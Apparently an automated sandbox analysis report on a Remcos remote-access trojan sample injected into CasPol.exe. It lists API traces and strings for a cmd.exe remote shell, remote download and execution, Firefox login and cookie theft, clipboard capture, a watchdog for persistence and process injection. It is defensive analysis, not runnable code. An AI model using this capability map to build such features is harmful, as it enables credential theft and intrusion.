Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
RegCloseKey.KERNELBASE(?), ref: 00412500

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8

Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409531

Strings

xAG, xrefs: 00409561

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _wcslen
String ID: xAG
API String ID: 176396367-2759412365
Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98

Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 00404212

Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277

CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18

Function 0043361D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7

Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,00434421,?,?,?,?,?,?,?,?,00434421,?,0046D644,00404AD0), ref: 00437C47

__CxxThrowException@8.LIBVCRUNTIME ref: 00433E14

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID:
API String ID: 3476068407-0
Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E

Function 00413F9A Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
WSASetLastError.WS2_32(00000000), ref: 00413FC1

Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
String ID:
API String ID: 1170566393-0
Opcode ID: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
Instruction ID: 6b8e1b3bf706901e9cebb32ced8ad4f2671330a9e567d97b4cc2d1cd49d6d23a
Opcode Fuzzy Hash: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
Instruction Fuzzy Hash: CED05B326406216FA310575D6D01FFBB5DCDFA67717110077F408D7110D6946D8283ED

Function 00446B0F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF

Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 00404277

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB

Function 00426107 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00426111

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

Function 0042611E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 00426128

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36

Non-executed Functions

Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00406F28
GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
DeleteFileW.KERNEL32(00000000), ref: 00407018

Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
DeleteFileA.KERNEL32(?), ref: 004078CC

Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E

Sleep.KERNEL32(000007D0), ref: 00407976
StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA

Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C

Strings

x@G, xrefs: 0040705B
>G, xrefs: 00406F54
Executing file: , xrefs: 0040742F
Failed to download file: , xrefs: 00407321
open, xrefs: 00407410
V>G, xrefs: 004071C6
Downloaded file: , xrefs: 004072A8
x@G, xrefs: 004076A6
Unable to delete: , xrefs: 00407078
Unable to rename file!, xrefs: 0040768F
x@G, xrefs: 00407998
H@G, xrefs: 00407473
x@G, xrefs: 00407563
Deleted file: , xrefs: 0040703A
Browsing directory: , xrefs: 004074B6
Downloading file: , xrefs: 004071F3

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
API String ID: 2918587301-599666313
Opcode ID: 67ca82a687dc1e454a75cc368f4517d0e6d9aa3d6c6889860952e852b2957f07
Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
Opcode Fuzzy Hash: 67ca82a687dc1e454a75cc368f4517d0e6d9aa3d6c6889860952e852b2957f07
Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B

Function 00405042 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 280pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040508E

Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

__Init_thread_footer.LIBCMT ref: 004050CB
CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7

Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571

Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291

Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB

WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
TerminateProcess.KERNEL32(00000000), ref: 004053C1
CloseHandle.KERNEL32 ref: 004053CD
CloseHandle.KERNEL32 ref: 004053D5
CloseHandle.KERNEL32 ref: 004053E7
CloseHandle.KERNEL32 ref: 004053EF

Strings

p\G, xrefs: 00405202
p\G, xrefs: 00405078
p\G, xrefs: 004052FE
p\G, xrefs: 00405332
cmd.exe, xrefs: 004050F5
p\G, xrefs: 004053D7
SystemDrive, xrefs: 00405109
(\G, xrefs: 00405183

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
API String ID: 3815868655-1274243119
Opcode ID: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
Opcode Fuzzy Hash: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E

Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00410F45

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6

Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500

CloseHandle.KERNEL32(00000000), ref: 00410F90

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A

Strings

fsutil.exe, xrefs: 0041114A
svchost.exe, xrefs: 00411100
Watchdog module activated, xrefs: 00410FBF, 00411210
Watchdog launch failed!, xrefs: 004111BE
Remcos restarted by watchdog!, xrefs: 00410F9B
WinDir, xrefs: 00411056, 004110AB
BG, xrefs: 0041101D
\SysWOW64\, xrefs: 0041109C
0DG, xrefs: 00410F6E
rmclient.exe, xrefs: 00411125
WDH, xrefs: 00410FF0, 00410FF6, 00411260
\system32\, xrefs: 00411044

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
API String ID: 65172268-860466531
Opcode ID: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
Opcode Fuzzy Hash: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F

Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
FindClose.KERNEL32(00000000), ref: 0040B3CE
FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
FindClose.KERNEL32(00000000), ref: 0040B517

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040B357
\logins.json, xrefs: 0040B439
\key3.db, xrefs: 0040B47B
UserProfile, xrefs: 0040B365
[Firefox StoredLogins not found], xrefs: 0040B3D9
[Firefox StoredLogins Cleared!], xrefs: 0040B504

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
Opcode Fuzzy Hash: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D

Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
FindClose.KERNEL32(00000000), ref: 0040B5CC
FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
FindClose.KERNEL32(00000000), ref: 0040B6B2
FindClose.KERNEL32(00000000), ref: 0040B6D1

Strings

[Firefox cookies found, cleared!], xrefs: 0040B6E0
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040B555
\cookies.sqlite, xrefs: 0040B62F
UserProfile, xrefs: 0040B563
[Firefox Cookies not found], xrefs: 0040B5D7, 0040B69F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
Opcode Fuzzy Hash: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E

Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371

Strings

BG, xrefs: 0040E380
Inj, xrefs: 0040E515
ieinstal.exe, xrefs: 0040E3D6
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040E3BF
ielowutil.exe, xrefs: 0040E417

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
API String ID: 726551946-3025026198
Opcode ID: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
Opcode Fuzzy Hash: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A

Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004159C7
EmptyClipboard.USER32 ref: 004159D5
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
GlobalLock.KERNEL32(00000000), ref: 004159FE
GlobalUnlock.KERNEL32(00000000), ref: 00415A34
SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
CloseClipboard.USER32 ref: 00415A5A
OpenClipboard.USER32 ref: 00415A61
GetClipboardData.USER32(0000000D), ref: 00415A71
GlobalLock.KERNEL32(00000000), ref: 00415A7A
GlobalUnlock.KERNEL32(00000000), ref: 00415A83
CloseClipboard.USER32 ref: 00415A89

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID:
API String ID: 3520204547-0
Opcode ID: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
Opcode Fuzzy Hash: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A

Function 00418764 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON

Download Yara Rule

Strings

7, xrefs: 0041895C
3, xrefs: 00418886
6, xrefs: 00418945
0, xrefs: 0041878D
1, xrefs: 004187C6
4, xrefs: 004188EA
2, xrefs: 00418826
5, xrefs: 0041893B

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
